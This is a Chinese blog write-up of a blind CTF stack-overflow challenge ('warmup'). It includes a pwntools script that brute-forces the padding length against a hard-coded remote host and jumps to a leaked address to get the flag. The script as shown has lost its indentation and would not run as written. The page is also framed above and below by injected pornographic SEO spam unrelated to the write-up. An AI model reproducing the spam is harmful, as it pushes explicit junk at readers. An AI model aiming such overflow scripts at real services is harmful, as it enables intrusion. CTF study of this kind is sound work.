<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      攻防世界pwn題:warmup

      0x00:前言

      這道題是盲打題,就是沒有給附件,只給了遠程環境。

      但這道題并不難,由于這種形式少見,所以我就在這里記錄一下。

      下面看看我的做題思路吧~

       

      0x01:做題思路

      1、初覽

       

       

       題目并沒有給附件,這時候就可以做好盲打的準備了。

       

      2、連接遠程并分析

      用nc連接一下遠程:

       

       

      給了一個地址,0x40060d,看地址是個64位的程序。給了一個地址,大膽猜測是get_shell或者是cat_flag相關的。然后我們可以操作的是輸入數據,回車也沒有任何返回值,這也可以排除格式化字符串漏洞。我們可以先考慮最簡單的棧溢出。

       

      3、編寫exp

      from pwn import *
      sys = 0x40060d
      
      for i in range(100):
      print(i)
      try:
        io = remote("111.200.241.244",53599)
        payload = b'A'*i + p64(sys)
        io.recvuntil(">")
        io.sendline(payload)
        print(io.recv())
        io.interactive()
      except:
        io.close()

       

      099依次嘗試,判斷溢出所需長度。

      在長度為72時,打印出了flag

       

       

      注意,這里要用try……except結構處理異常,不然就會報錯導致退出執行:

       

       


       

      tolele

      2022-07-02

       

      posted @ 2022-07-02 20:04  tolele  閱讀(907)  評論(0)    收藏  舉報
      主站蜘蛛池模板: 久久毛片少妇高潮| 福利网午夜视频一区二区| 国产一区二区三区韩国| 无码精品国产va在线观看| 国产av丝袜旗袍无码网站| 国产亚洲国产亚洲国产亚洲| 午夜精品福利亚洲国产| 巩义市| 国产精品美女www爽爽爽视频| 国产一区二区三区麻豆视频| 黄页网址大全免费观看| 99久久久国产精品免费无卡顿| 一区二区三区鲁丝不卡| 国产成人亚洲日韩欧美| 久久久www成人免费精品| 国产精品亚洲一区二区在| 亚洲精品国模一区二区| 本道久久综合无码中文字幕| 亚洲中少妇久久中文字幕| 亚洲精品一二三在线观看| 国产精自产拍久久久久久蜜| 国产精品制服丝袜第一页| 69人妻精品中文字幕| 亚洲人成色77777在线观看| 人妻系列中文字幕精品| 国产精品v片在线观看不卡| 天天弄天天模| 久久熟女| 亚洲国产午夜福利精品| 女人被狂躁的高潮免费视频| 中文字幕有码在线第十页| 一区二区亚洲人妻精品| 永康市| 又黄又爽又色的少妇毛片| 一本无码人妻在中文字幕免费| 亚洲色欲色欱WWW在线| 漂亮人妻被强中文字幕久久 | 国厂精品114福利电影免费| 西西午夜无码大胆啪啪国模| 中文字幕国产精品第一页| 日韩国产成人精品视频|